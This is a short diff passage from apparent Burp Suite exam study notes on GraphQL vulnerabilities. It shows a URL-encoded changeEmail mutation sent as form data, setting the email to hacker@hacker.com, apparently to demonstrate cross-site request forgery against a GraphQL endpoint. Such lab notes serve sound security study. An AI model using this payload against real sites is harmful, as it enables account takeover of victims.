ComplexSecurity/Burp-Suite-Exam/GraphQL API Vulnerabilities/GraphQL API Vulnerabilities.md

 }
 ```

+Try re-submitting with a new email to ensure a session token can be reused to send many requests.
 After changing the request method, add it back as non-JSON data:

 ```json
 query=%0A++++mutation+changeEmail%28%24input%3A+ChangeEmailInput%21%29+%7B%0A++++++++changeEmail%28input%3A+%24input%29+%7B%0A++++++++++++email%0A++++++++%7D%0A++++%7D%0A&operationName=changeEmail&variables=%7B%22input%22%3A%7B%22email%22%3A%22hacker%40hacker.com%22%7D%7D